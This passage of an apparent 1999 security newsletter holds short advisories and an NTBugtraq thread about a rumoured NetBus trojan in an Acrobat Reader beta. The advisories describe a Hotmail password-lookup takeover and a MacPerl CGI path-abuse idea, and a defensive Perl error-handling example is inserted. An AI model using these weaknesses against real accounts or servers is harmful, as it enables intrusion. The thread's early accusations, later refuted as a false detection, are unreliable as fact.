were creating the feature," said Microsoft product manager Mike Nichols. "The
feature doesn't pose a super-huge risk. But Microsoft is looking at ways of
modifying this feature in future releases."
@HWA

06.0 High tech on the battlefield
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

WITH HIGH TECH AGAINST CYBERWARS
by BHZ, Friday 16th Apr 1999 on 3:15 pm CET

A device known as the End User Terminal, or EUT, a mobile, wireless computer
communication and tracking system, was one of several high-tech systems
demonstrated Wednesday as troops staged a raid on a mock city of cinderblock
buildings at Camp Pendleton, 40 miles north of San Diego. The EUT allows
combat troops to pinpoint the location of friendly and enemy troops in the
area. Then they can relay that information in real time back to commanders,
who can then send in air strikes or reinforcements. Worn like a backpack, the
EUT includes an ultra-small notebook computer, a power amplifier and global
positioning system receiver. A designer for Litton PRC of McLean, Va., said
the 12-pound pack costs about $5,500. The downside of the system seems to be
its fragility. Spectators wondered what would happen if the computer took a
beating on the battlefield, became infected with chemical weapon residue or
fell into enemy hands -- with precise data on troop locations.

Contributed by Thejian.

@HWA

07.0 Hotmail has similar vulnerability to last week's Rocketmail advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

from: http://securityhole.8m.com/

More Webmail Madness; Hotmail vulnerable - 18 April 1999

We released our Rocketmail advisory about a week ago, and decided to do some
more digging. This time we were able to get into an old Hotmail account of
ours via the password lookup function. Once the clue was given, a random
string of letters and numbers, we typed in the clue as the answer. This proved
sufficient to be taken to the next level, where we entered a new password.
Once again, the mail which was in the account was missing, probably deleted
automatically after x amount of days, but the original preferences, including
name and location of the account holder, were still intact.

We hope Hotmail will try to fix this hole, which was also found in Rocketmail.
We recommend removing password lookup functions on all webmail sites, and
deleting accounts after 4 months of inactivity.

MAO Enterprises ERT

@HWA

08.0 MacPerl CGI vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~

Some MacPerl CGIs Reveal Server Pathnames - 10 April 1999

This is evidently the fault of diagnostic output utilized by some Perl CGIs
served via MacPerl and a webserver. When a CGI with diagnostic output
encounters an error, it prints (displays) the cause of the error in the script
in addition to the pathname of the file. The CGI is usually in the cgi-bin
directory of the webserver, so this is not new. However, it gives the full
path to the script. If the path is Server HD:Web Apps:Serving:Webstar 3.0:
cgi-bin:dumbscript.cgi, then that will be displayed for all to see.

This poses a problem. If a person with devious intent were to rename their own
hard drive as Server HD and create a series of folders with the same names as
the folders on the webserver's drives, and then make an alias of the end
result, the alias can be uploaded to the webserver, and it will be functional
because the paths are identical. A compressed alias uncompressed in a publicly
accessible area or in a trojan application could be devastating due to the
personal and sensitive information possibly contained within.

We hope CGI developers will keep the paths to themselves from now on, and not
make it public information.
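The leak above is Perl's own diagnostic text reaching the browser: any die() message not ending in a newline gets "at <script path> line N" appended, so sending fatals to the client discloses the full path. The script below is an added example, not part of the advisory, written for a Unix-style Perl CGI rather than MacPerl specifically; "data.txt" is a constructed file name. It shows the leaky pattern (as a comment) next to a version that keeps the detail in the server's error log.

```perl
#!/usr/bin/perl
# Added example, not from the advisory: a CGI whose error handling leaks its
# own pathname, next to one that logs the detail and tells the client nothing
# useful. Unix-style Perl is assumed; "data.txt" is a constructed name.
use strict;
use warnings;

# --- Leaky pattern (what the advisory describes) -------------------------
# Routing diagnostics to the browser is handy while developing, but every
# uncaught die() then reaches the client, and Perl appends "at <path> line N"
# to any message that does not end in a newline, so the full script path
# (e.g. "Server HD:Web Apps:Serving:Webstar 3.0:cgi-bin:dumbscript.cgi") goes
# out with it. Kept as a comment so this file runs in its hardened form:
#
#   use CGI::Carp qw(fatalsToBrowser);
#   open(my $fh, '<', 'data.txt') or die "cannot open data.txt: $!";
#
# The client would see: cannot open data.txt: No such file or directory
#                       at /full/path/to/dumbscript.cgi line 12.

# --- Hardened pattern -----------------------------------------------------
# Detail goes to STDERR, which the web server writes to its error log; the
# client only ever gets a fixed message and a 500 status.
sub fail_safely {
    my ($detail) = @_;
    warn "[$0] $detail";                      # $0 = script path, log only
    print "Status: 500 Internal Server Error\r\n";
    print "Content-Type: text/plain\r\n\r\n";
    print "An internal error occurred; the administrator has been notified.\n";
    exit 0;
}

# All real work runs inside eval, so no die() (ours or a library's) can escape
# to the browser; the body is read completely before anything is printed.
my $ok = eval {
    open(my $fh, '<', 'data.txt') or die "cannot open data.txt: $!";
    local $/ = undef;                         # slurp the whole file
    my $body = <$fh>;
    close $fh;
    print "Content-Type: text/plain\r\n\r\n";
    print $body;
    1;
};
fail_safely($@ || 'unknown error') unless $ok;
```

Run it from a cgi-bin without data.txt present and the browser gets only the generic 500 page, while the error log records the path and the real cause.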
MAO Enterprises ERT

@HWA

09.0 The Adobe Acrobat NetBus scare thread;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date:     Tue, 6 Apr 1999 07:41:06 -0600
Reply-To: "Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>
Sender:   Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:     "Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>
Subject:  Adobe put Trojan horse in Acrobat.
Comments: To: "firewall-wizards@nfr.com" <firewall-wizards@nfr.com>
Comments: cc: "Samos, Randy B." <samos@anubis.network.com>

We recently found an alarming problem with Adobe's pre-release of Acrobat 4.0.
When one of our users downloaded and installed the pre-release, McAfee, using
data definitions 4.0.4017, stated that one file net bus pro.dr contained a
virus and could not be removed. Of course we investigated and see NetBus
there. The user opened a problem report with Adobe. They acknowledge that
NetBus Pro is part of the package, but 'have not been reported to cause
problems with anyone's computer at this time.'

I personally find this absolutely reprehensible that they would purposely put
'remote administration and spy software' in a package that will be widely
distributed around the world. That is all any of us need is to have a lot of
users install this, and the nefarious users obtain the whole package and start
whacking desktops whenever they choose.

Comments?

[ Jim Wamsley, Network Engineering
[ StorageTek
[ One StorageTek Drive, M.S. 4380, Louisville, CO 80028
[ Audible: (303) 673-8163  Logical jim_wamsley@stortek.com
[ Sed quis custodiet ipsos custodes - Juvenal, C. 100 C.E

----------------------------------------------------------------------------------------

Date:     Wed, 7 Apr 1999 15:05:18 -0400
Reply-To: Russ <Russ.Cooper@RC.ON.CA>
Sender:   Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:     Russ <Russ.Cooper@RC.ON.CA>
Subject:  Re: Adobe put Trojan horse in Acrobat.
Comments: To: "Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>

Interim Update:

James is in a seminar today, and while I was able to drag him out of it long
enough to ask a few questions, some will remain unanswered until tomorrow
(when he can get to the source messages he has).

- They found NetBusPro.dr in a pre-released version of Adobe Acrobat Reader
  4.0

- They reportedly got a response from Adobe indicating it had been put there,
  and that "nobody has reported it to cause any problems".

When I spoke to Adobe Customer Service, they could not find any reference to
NetBus being included, officially, in any of their Acrobat released products.

Several posters have stated they do not find NetBus when scanning with McAfee
(various versions) against the released Adobe Acrobat 4.0 package (note, I
don't believe this is the same package James was referring to).

I received a message from one poster that included a snippet of a message he
received from a member of the anti-virus research community, within which was
a supposed response from McAfee. McAfee was supposedly acknowledging that this
was a false detection within their 4.0.4017 .DAT file. The response said that
this would be fixed "in a future update of the .DAT files".

I downloaded and checked the McAfee 4.0.4019 .DAT file WhatsNew.txt file, but
it makes no mention of any false detection, or whether or not it's been
corrected. James has not scanned it with 4.0.4019 so cannot say if it has, in
fact, disappeared or not.

My apologies for how long this response has taken. James' message caused a
flood of responses and I had hoped to get him to give us some more facts. It
took me a while to track down his pager number (ain't social engineering
fun!), hence the delay.

I have messages into the senior researchers at NAI, but as yet they haven't
responded either.

Without accurate info about precisely where James got precisely what, it's
hard to ask Adobe many more questions than I already have.
I truly goofed in sending this one out without a little more clarification in
advance... tsk, tsk...

More when something useful arises.

Cheers,
Russ - NTBugtraq moderator

----------------------------------------------------------------------------------------

Date:     Thu, 8 Apr 1999 21:33:18 -0400
Reply-To: Russ <Russ.Cooper@RC.ON.CA>
Sender:   Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:     Russ <Russ.Cooper@RC.ON.CA>
Subject:  Re: Adobe put Trojan horse in Acrobat.

Well, I guess neither NAI nor Adobe think enough of us to warrant us with
their direct response, so instead, you get me...;-]

Last night, I spoke with Vincent Gullotto, Manager of AV Researchers at AVERT,
the Supreme Beings of NAI's Anti-Virus crowd. I had sent him a message early
yesterday about the Adobe issue and wanted his confirmation after I had
received a redirected note originating from DataFellows quoting confirmation
from McAfee that the detection of NetBusPro in the pre-release of Adobe Reader
4.0 was, in fact, a mis-detection.

Well, Vincent was nice enough to confirm to me that it was, in fact, a
mis-detection. He agreed that his group would confirm this to NTBugtraq, but
he needed some confirmation from his researchers regarding precisely which
versions of their .DAT files were mis-detecting. "Tomorrow", he said.

I figured that many of you would not accept a simple explanation from Adobe,
or a 3rd party confirmation from DataFellows. I spoke to, indirectly, PR
people at Adobe. Seems Adobe is going to publish something on Saturday (gee,
thanks for being so quick Frank). I figured, well, this wasn't going to
convince you either. I stressed to Vincent the need to have NAI confirm the
mis-detection. Gee, he agreed, but here we are and still no confirmation.
Now I've never been one to hide my disdain for the way NAI handles important
issues, but I figured after a person-to-person conversation that I took the
trouble to initiate, and after him telling me point blank that we'd see
something today... sigh... oh well, guess I had higher expectations than I
should have.

So, take my word for it, both NAI and Adobe say the detection of NetBusPro in
the pre-release of Adobe Reader 4.0 was a mis-detection.

That said, Adobe did confirm that there was a file in that version called
NetBusPro.dr. Now ask yourself, who would be stupid enough to call a file in,
even, a pre-release package such a significantly suspicious name as NetBus?
Adobe and NAI both seem suspiciously silent about this fact. Did NAI detect
something and Adobe convinced them to call it a mis-detection? Did Adobe
incorporate NetBusPro into their product and sufficiently hide it, maybe with
NAI cooperation, such that detection programs don't see it anymore?

I have a copy of a message from service@adobe.com which states that
NetBusPro.dr is, in fact, included in the pre-release. That same message
includes links to the NetBus home page, as if to say, "if you want to know
what this thing does, the thing we included in this package, go here and
you'll find out".

Another message I have from Adobe internal says that they've been seeing this
rumor for a week now, and on lists where they don't have dedicated lurkers to
dispel such rumors, it's run rampant.

If you don't know me, let me tell you. I'm pretty good at getting to the
bottom of things with any company. The fact that Adobe is so unconcerned about
this "rumor" that they're not publishing anything to dispel it until Saturday
stinks of other issues to me. The fact that NAI, despite a personal
confirmation and agreement to publish a statement, still have not, also stinks
of other issues to me.

In the spirit of "better safe than sorry", I'd say this.
Stay away from Adobe Acrobat Reader 4.0 and NAI scanners until this thing has
been clarified beyond a shadow of a doubt (and if you ask me, I don't know how
that is now possible).

Draw your own conclusions.

DataFellows had a page up about NetBus earlier today, which I saw, at
http://www.europe.datafellows.com/v-descs/netbus.htm, which now seems to be
unavailable. I had personal messages from folks at DataFellows confirming it
was a mis-detection, but they weren't prepared to state this on the list.

As a responsible White Hat I wanted to get NAI to confirm it was a
mis-detection, and put the whole issue to rest. But as a responsible
journalist, I figure the above is the best you can expect, at least for now. A
fine line, I know, but if you'd been told what I've been told, I suspect you'd
be thinking like me.

Cheers,
Russ - NTBugtraq moderator

----------------------------------------------------------------------------------------

Date:    Thu, 8 Apr 1999 19:08:42 -0700
From:    Sarah Rosenbaum <srosenba@ADOBE.COM>
To:      BUGTRAQ@netspace.org
Subject: ALERT: No viruses in Acrobat Reader

The public beta release of Acrobat Reader 4.0, posted on www.adobe.com in
early March, was rumored to contain a virus. This is a false report.

McAfee VirusScan 4.x.x for Windows using the 4.0.4017 Virus DAT file released
March 15, 1999 reported that the pre-release version had the NetBusPro.dr
virus, but this was due to an imprecise virus specification within the
4.0.4017 Virus DAT file itself. The 4.0.4019 Virus DAT file released by
Network Associates on March 29, 1999 corrects the problem and shows that the
file is free of viruses. Both the virus lab at Network Associates and Adobe
Systems Inc have confirmed this fix. BTW, the 4.0.4015 Virus DAT file that was
current as of early March had also shown the file to be free of viruses.
All pre-release and release versions of Acrobat 4.0 Reader are free of known
viruses. Adobe uses a number of virus scanning utilities, in addition to
McAfee, to thoroughly screen all software before it is released publicly.
Thank you for your attention in this matter.

Sarah

-------------------------------------------------------------------------
Sarah Rosenbaum                 Adobe Systems Incorporated
Group Product Manager           345 Park Avenue, MS E14
Adobe Acrobat                   San Jose, CA 95110
408-536-3844 (v)                srosenba@adobe.com
408-537-4005 (f)                www.adobe.com/acrobat
------------------------------------------------------------------------

----------------------------------------------------------------------------------------

Date:    Fri, 9 Apr 1999 11:27:16 -0400
From:    Russ <Russ.Cooper@RC.ON.CA>
To:      NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: A post on you NT Bugtrack

Here's the message I received from NAI last night, shortly after my message
went out to the list. Unfortunately it was sent directly to me rather than to
the list itself.

Cheers,
Russ - NTBugtraq moderator

-----Original Message-----
From: Gullotto, Vincent [mailto:Vincent_Gullotto@NAI.com]
Sent: Thursday, April 08, 1999 10:16 PM
To: 'Russ'
Subject: A post on you NT Bugtrack

As we spoke about yesterday, and I did confirm and agree to provide you and
your readers a response, here is a statement from AVERT, A Division of NAI
Labs.

The topic discussed in the NT BugTrack Subject: "Adobe put Trojan horse in
Acrobat" was initially brought to our attention on 3/19/99. The detection of
the NetBusPro tool in the ar40.exe file was incorrect. This occurs with the
4017 and 4018 DAT sets for McAfee and Dr Solomon VirusScan 4.XX products,
which were posted on March 17th and March 24th to the AVERT Labs web page. The
correction was made to the 4019 DAT set which was posted on March 29 on NAI's
FTP site.
Vincent Gullotto
Manager, AV Research
AVERT-NAI Labs
www.avertlabs.com <http://www.avertlabs.com>

----------------------------------------------------------------------------------------

Date:    Fri, 9 Apr 1999 14:19:34 -0400
From:    Russ <Russ.Cooper@RC.ON.CA>
To:      NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Adobe put Trojan horse in Acrobat.

I've just put an editorial on the Adobe issue up on the NTBugtraq site, it
includes the source information I received that has led me to make some of
the statements I have. Many people asked me to disclose more of what I had in
support of my comments.

Check out the revised News bulletin on the NTBugtraq Home Page,
http://ntbugtraq.ntadvice.com, titled "NetBusPro in Adobe? You decide!".

Cheers,
Russ - NTBugtraq moderator

----------

[http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=28]

What's up with Adobe?
Written by Russ Cooper - 4/9/99 12:42:42 PM

Preface:

Due to over-whelming response, this page is an attempt to disclose what
information I have received regarding this issue. While some of the
information is verbatim copy I've received from others, I should make it
clear that I have altered some information in order to protect sources. I
hope that my reputation as a responsible and reliable source of accurate
information is not tainted by this fact.

In addition, this page also contains speculative observation and editorial
commentary. I personally have not been able to investigate the true purpose
of any component within the Adobe Acrobat Reader pre-release 4.0. I do not
intend to, I leave that task to others who are more capable in this regard. I
would appreciate hearing any findings, email me at russ.cooper@rc.on.ca.

I hope this allows you to draw your own conclusions. I hope this will also
encourage both Adobe and Network Associates, Inc. to better communicate with
its user community over issues as sensitive as this one is.
History:

The alarm raised by Jim Wamsley of StorageTek
<http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9904&L=ntbugtraq&F=P&S=&P=779>
over the possible presence of NetBusPro within the Adobe Acrobat Reader
pre-release 4.0
<ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip> was, I
thought, of import to NT Security-minded folks everywhere. McAfee's anti-virus
definition file (.DAT file) version 4.0.4017 told him that it believed
NetBusPro might be included in the AR40.EXE file (extracted from the
downloaded AR40.zip file from Adobe's FTP site)
<ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip>. James
had received this warning from one of his users and, correctly IMO, alerted
NTBugtraq.

James' user went to Adobe's Tech Support web site and submitted a question to
them. A response was ultimately sent to that user from a generic Adobe Service
account (service@adobe.com). The edited response follows (it has been edited
because it contained not only the user name and email address, but also IP
address information of the user. The Adobe "Thread Number", a tracking number
they use, has also been omitted. Anyone from Adobe who would like this number
is welcome to contact me for it);

-----Original Message-----
From: service@Adobe.COM [mailto:service@Adobe.COM]
Sent: Friday, April 02, 1999 10:34 AM
To: xxxxxxx@stortek.com
Subject:

Hello xxx,

Thank you for taking the time to alert us of the presence of a possible virus
in the Acrobat Reader 4.0 Pre-release download. Although we have received
reports of this virus from a number of different sources, our engineers have
not found the presence of an actual virus in the posted file. NetBus Pro is
the name of a software application from another company, and we suspect that
the NetBusPro.dr file within the Acrobat Reader 4.0 Pre-release is being
mistakenly reported as a virus (although this has not yet been confirmed).
We do know for certain that the Acrobat Reader 4.0 Pre-release (Ar40.exe) has
not been reported to cause problems with anyone's computer at this time.

To obtain a version of the Acrobat Reader 4.0 Pre-release that has been
verified not to produce any virus messages with McAfee, please download it
from the following ftp site:

ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip

For more information on NetBus Pro, please visit the following website:

http://NetBus.Org/main.html

Also, visit the following URL on the Adobe Web site for the latest customer
service and technical information:

http://www.adobe.com/supportservice/custsupport/main.html

Thank you for contacting Adobe Customer Support via the Adobe Web site.

Best regards,

Adobe Customer Support

THREAD:xxxxxxxxxxxxxxxxxxxxx

The thread number (above) is your reference number for this issue.

Thank you for visiting www.adobe.com. We hope this reply answers your
question. Inquiries such as yours often prompt us to update or add
information to www.adobe.com so it can be available to other customers.
Please return to www.adobe.com for additional information and inquiries.
Copyright 1999 Adobe Systems Incorporated

--- On 03/16/99, you wrote ---

WebSite: Adobe.com
ProblemType: Other
WebURL: http://www.adobe.com/

CONTENT_LENGTH = 741
CONTENT_TYPE = application/x-www-form-urlencoded
GATEWAY_INTERFACE = CGI/1.1
HTTPS = OFF
HTTP_ACCEPT = application/vnd.ms-excel, application/msword,application/vnd.ms-powerpoint, image/gif, image/x-xbitmap, image/jpeg,image/pjpeg, */*
HTTP_ACCEPT_ENCODING = gzip, deflate
HTTP_ACCEPT_LANGUAGE = en-us
HTTP_COOKIE = AWID_9.80.22.140:10745:918855192:81;WECCIDCookie932364811728316
HTTP_FORWARDED = by http://xxxxxx.xxxxxxx.xxx:80 (Netscape-Proxy/3.5)
HTTP_HOST = cgi1.adobe.com
HTTP_PRAGMA = no-cache
HTTP_REFERER = http://www.adobe.com/misc/webform.html
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0b2; Windows NT)
PATH = /usr/sbin:/usr/bin
REMOTE_ADDR = xxx.xxx.xxx.xxx
REMOTE_HOST = xxx.xxx.xxx.xxx
REQUEST_METHOD = POST
SCRIPT_NAME = /misc/comments04.cgi
SERVER_NAME = cgi1.adobe.com
SERVER_PORT = 80
SERVER_PROTOCOL = HTTP/1.0
SERVER_SOFTWARE = Netscape-Commerce/1.12
SERVER_URL = http://cgi1.adobe.com
TZ = US/Pacific

The virus scan program I'm using (McAfee) says there is a virus in the
AR40.exe file that is part of the Adobe Acrobat .zip file I just downloaded.
VirusScan says it is a "NetBusPro" virus and can't remove it. My company's
team responsible for virus things say it is a new version of NetBus, which is
a Trojan Horse virus. Please contact me about this.

--- original message ends ---

Now as you can see, this certainly comes across as Adobe confirming the
presence of a file called NetBusPro.dr. I have installed the same version
that this person was referring to and cannot find a file anywhere on my
system called NetBusPro.dr, however this does not mean it's not present as
the Adobe Server Rep. states.
It's also worth pointing out that Adobe does not state, even in their public
announcement
<http://listserv.netspace.org/cgi-bin/wa?A2=ind9904b&L=bugtraq&F=&S=&P=1246>
on the issue posted to Bugtraq, that the program in question does not have
NetBusPro in it, they merely say it is free of viruses. I'm normally a
trusting individual, but Adobe's lack of making an unequivocal statement that
NetBusPro is not present would seem to have been the right thing to do.

In the copy of the Adobe Internal Engineering document referencing this
supposed false detection, a paragraph is present which is not present in the
public Adobe statement;
<http://listserv.netspace.org/cgi-bin/wa?A2=ind9904b&L=bugtraq&F=&S=&P=1246>

"NetBus Pro 2.0 by Carl-Fredrik Neikter is a remote administration and spy
tool. It enables you to remotely administer computers. Earlier versions of
NetBus were used illicitly by people who create viruses to play tricks on
other people by enabling them to remotely control their computers. These
viruses involving NetBus were known as NETBUS.153 and NETBUS.160. NetBus Pro
2.0 is more robust than earlier versions known as NetBus, and NetBus Pro 2.0
is significantly more difficult to distribute as a virus."

Again, they seem more than willing to give praise to the NetBusPro product
and make an attempt to differentiate its characteristic as a "virus" from
earlier versions.

Shortly after I sent James' message through to NTBugtraq I sent messages to 4
individuals at Network Associates, Inc.'s AVERT Labs
<http://www.avertlabs.com>, including Vincent Gullotto, Manager of AV
Researchers (sent on 4/7/99 1:51pm EDT). Vincent had previously offered these
contacts for virus-related issues. My message said;

I released information this morning regarding the supposed inclusion of
NetBus in Adobe Acrobat 4.0 based on McAfee 4.0.4017 identifying it being
present in AR40.EXE. I've subsequently received a message stating that this
was a mis-detection by your virus scanner.
The poster included text supposedly originating from McAfee, but I have been
unable to find it on your web site. The text was;

-----------------------
This file AR40.EXE for Adobe Acrobat Reader 4.0 is identified by .DAT 4017 as
containing "NetBusPro.dr" trojan:

Scanning file D:\!VIRUS\ar40.exe
D:\!VIRUS\ar40.exe could have NetBusPro.dr trojan !!!

This is a false detection. This will be corrected in a future update of the
.DAT files.

Also thank you for the sample referred to as XXXXXX. It has been forwarded to
our researchers for examination and a researcher will get back to you with our
findings.
-----------------------

Could you please confirm this, and if possible, provide a link to a publicly
accessible statement from McAfee on this? Alternatively, could you have
someone respond directly to NTBugtraq@listserv.ntbugtraq.com re-stating the
above.

Your quick reply would be greatly appreciated. I would also greatly appreciate
a direct phone number for any of you.

Cheers,
Russ - NTBugtraq moderator

The included quote originated from a respected AV Researcher with
DataFellows, and seems to have been sent to a number of people (despite this,
I won't disclose the sources). Virtually the same wording ended up on
DataFellows Web Site <http://www.europe.datafellows.com/v-descs/netbus.htm>
late yesterday (btw, they have told me it was unavailable when I went to look
at it yesterday simply due to the volume of hits it was receiving).

At ~5:30pm EDT on 4/7/99 I called Vincent directly and spoke with him and one
of his researchers about the issue. I stressed that we (NTBugtraq) needed a
confirmation message from NAI to clarify the issue. I asked about NAI's
policy regarding mis-detections and was told they do not make the information
public. Not that they don't want to, only that they hadn't yet gotten around
to placing the information somewhere on their web sites.
Of course I pointed out that it could be included in their WhatsNew.txt file
included in each .DAT file update, and he said he would consider what could be
done.

Meanwhile, it was agreed that NAI would post something to the list, as a
direct response to my message to the list, that clarified what had happened.
Vincent indicated that he needed to talk to an AV Researcher in the U.K. to
determine precisely which .DAT file versions caused a mis-detection. Since it
was already after U.K. closing, NTBugtraq could expect a message the following
day (4/8/99). I certainly appreciated his thoroughness, and more than
appreciated his cooperation in discussing the issues with me personally.

It's probably reasonable to point out here that I stressed to Vincent my
understanding of how mis-detections happen. I have no expectation that
mis-detections will not occur, of course I hope they will be few and far
between like he does, but they're bound to happen. I fully support any AV
vendor whose product happens to mis-detect a virus, better safe than sorry. I
pointed out, however, that it's just as important to make disclosure of
mis-detections. A number of messages I received in response to the original
issue pointed out to me the harm they had been subjected to by people claiming
they were being sent infected documents or files... claims made due to
mis-detections. It's one thing for me to tell you that something is a
mis-detection, but I would hope you'd only believe it if the AV vendor said
so.

After waiting until 9:30 EST on 4/8/99, after closing for the U.S., for a
message from NAI clarifying the issue, I felt I should post something
<http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9904&L=ntbugtraq&F=P&S=&P=1323>.
The volume of messages I was receiving on the issue indicated that many
people felt it was an important issue. By this time I had spent a great deal
of time thinking about the various aspects of this whole affair.
Adobe seemed to be pointing people to NetBus, and seemed unwilling to outright state it was not in their product. NAI had promised a message to the list, but none materialized. I started to ask myself just how the mis-detection worked, and more importantly, how it could be corrected! Was VirusScan simply detecting the word "NetBusPro" somewhere in the file? According to my discussions with NAI, the mis-detection came from the reader containing "an icon that was very similar to one found in NetBusPro" as well as "some header material that was very similar". So did Adobe change an icon in the final release to stop the mis-detection? Or did NAI say to its .DAT file "if you see something that looks like NetBusPro in Adobe Acrobat Reader 4.0, ignore it, its not NetBusPro!"?? No doubt AV Researchers can better explain why mis-detections happen, and how application vendors can make software that causes mis-detections, but both parties lackadaisical attitude to the issue just left me feeling like something was missing. I thought it reasonable that maybe Adobe included NetBusPro in the pre-release of their Reader in order to assist them during the beta testing phase. Might make sense, and they may have satisfied themselves that NetBusPro was the right product to assist them. Of course there should have been mention of this in the docs somewhere, and they should have acknowledged it in their announcement to the public. But I wouldn't expect NAI to remove detection of it, regardless of why it might be there. Did the NetBusPro folks get on NAI's back and tell them to stop detecting their now commercial version of the product as a Trojan?? If I were the owners of NetBusPro, and I was trying to sell it commercially, I certainly wouldn't be pleased that AV vendors were telling my users its a Trojan and shouldn't be trusted, would you? 
Or is it all just a simple issue of VirusScan simply being a bit too broad in its signature matching routines and picking up something completely unrelated to NetBusPro and thinking it was NetBusPro? This is probably the case, but I ask myself, how will I ever know?? I'm not a conspiracy theorist like some of my on-line friends...(Hi Bill...;-])...but clearly there needs to be a more effective mechanism of handling these issues that is convincing enough to quell any suggestion of suspicious behavior. Unfortunately, I don't have an answer for that right now, hence my skepticism.

Hopefully one of you with the ability to decompile and analyze code will be able to tell us, for certain, whether or not there is any NetBusPro functionality in the Adobe Acrobat Reader pre-release 4.0. Hopefully Adobe will make an unequivocal statement that there is not such functionality in any version of their product. Hopefully NAI, and all AV vendors, will start making lists of mis-detections available to the public as and when they happen. Hopefully I haven't over-hyped this issue, and instead, have helped somewhat to make such issues less worrisome in the future. That was my intent.

Cheers,
Russ - NTBugtraq moderator

comments welcome...

----------------------------------------------------------------------------------------

Date: Mon, 12 Apr 1999 08:04:20 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: ALERT: No viruses in Acrobat Reader

Received: from smtp-relay-1.adobe.com ([192.150.11.1]) by ns.ntbugtraq.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.1960.3)
        id H1GPKN43; Sun, 11 Apr 1999 23:02:50 -0400
Received: from inner-relay-1.Adobe.COM ([153.32.1.51] (may be forged))
        by smtp-relay-1.Adobe.COM (8.8.6) with ESMTP id TAA23125
        for <Russ.Cooper@rc.on.ca>; Sun, 11 Apr 1999 19:57:16 -0700 (PDT)
Received: from mail-321.corp.Adobe.COM
        by inner-relay-1.Adobe.COM (8.8.5) with ESMTP id UAA15768; Sun, 11 Apr 1999 20:02:44 -0700 (PDT)
Received: from sarahtp600
        by mail-321.corp.Adobe.COM (8.7.5) with SMTP id UAA08101; Sun, 11 Apr 1999 20:02:41 -0700 (PDT)
Message-Id: <4.1.19990411190139.00afeda0@mail-321.corp.adobe.com>
X-Sender: srosenba@mail-321.corp.adobe.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Sun, 11 Apr 1999 19:55:55 -0700
To: Russ <Russ.Cooper@rc.on.ca>
From: Sarah Rosenbaum <srosenba@Adobe.COM>
Subject: RE: ALERT: No viruses in Acrobat Reader
In-Reply-To: <61143C10CC8AD211A2F10000F878E683066F9C@ns.rc.on.ca>
Mime-Version: 1.0

-----Original Message-----
From: Sarah Rosenbaum [mailto:srosenba@Adobe.COM]
Sent: Sunday, April 11, 1999 10:56 PM
To: Russ
Subject: RE: ALERT: No viruses in Acrobat Reader

Dear Mr. Cooper,

Below is an additional statement regarding the false reports that the Adobe Acrobat Reader pre-release contained a "virus," or more specifically, the NetBusPro software. Although we believe the original statements from Adobe Systems Incorporated and Network Associates, Inc. last Thursday (April 8) clearly refuted the false report, your commentary on this issue on www.ntbugtraq.com suggests that you did not find such statements unequivocal.

We appreciate the service your web site provides to the software industry. However, given the rapidity with which false information can spread over the internet, we would appreciate that great care be taken to verify information that can so seriously harm a developer of top quality software. As you know, Adobe products are highly regarded. False reports such as these are damaging and also require a use of Adobe's resources which are better spent contributing to innovation.

Thank you for posting the information below to your web site. For further information, please don't hesitate to contact me.

Regards,
Sarah

-------------------------------------------------------------------------
Sarah Rosenbaum                     Adobe Systems Incorporated
Group Product Manager               345 Park Avenue, MS E14
Adobe Acrobat                       San Jose, CA 95110
408-536-3844 (v)                    srosenba@adobe.com
408-537-4005 (f)                    www.adobe.com/acrobat
-------------------------------------------------------------------------

Subject: NO NetBusPro IN ADOBE ACROBAT READER

Adobe software, such as Acrobat Reader, does not include, nor did it ever include, any NetBus or NetBusPro software.

McAfee VirusScan 4.x falsely reported the NetBusPro.dr software when scanning Ar40.exe and Ar40eng.exe pre-release software when using virus definitions 4.0.4017. The virus alert was caused by an error in version 4.0.4017 of the virus definition file distributed by Network Associates, Inc. This has been confirmed by the virus lab at Network Associates, Inc. and by Adobe Systems Incorporated. When you install virus definitions 4.0.4019, VirusScan 4.x does not report an error with Ar40.exe or Ar40eng.exe.

Adobe uses a variety of anti-virus software in addition to McAfee VirusScan to thoroughly screen all software before it is publicly released.

There was some confusion from original reports because NetBusPro is described as both a virus and a "trojan horse". It is a common confusion because software such as NetBusPro is sometimes picked up by virus detection software.

Regards,
Sarah Rosenbaum

-------------------------------------------------------------------------
Sarah Rosenbaum                     Adobe Systems Incorporated
Group Product Manager               345 Park Avenue, MS E14
Adobe Acrobat                       San Jose, CA 95110
408-536-3844 (v)                    srosenba@adobe.com
408-537-4005 (f)                    www.adobe.com/acrobat
-------------------------------------------------------------------------

At 01:28 PM 4/10/99 -0400, you wrote:
>Could you get Adobe to confirm, publicly, that Adobe Acrobat Reader 4.0,
>any version be it beta or otherwise, never has, and does not, contain
>components, or the complete version, of NetBusPro 2.x?
>
>NetBus v1.xx is considered a "virus", or a Trojan actually, but the
>commercial product NetBusPro 2.x is not considered as such.
>
>Adobe's public statement, sent in your name, does not make this
>distinction sufficiently for many of my 24,000+ subscribers (or me).
>
>Such a clarification, in public, either on your web site or via email,
>would put this matter to rest once and for all.
>
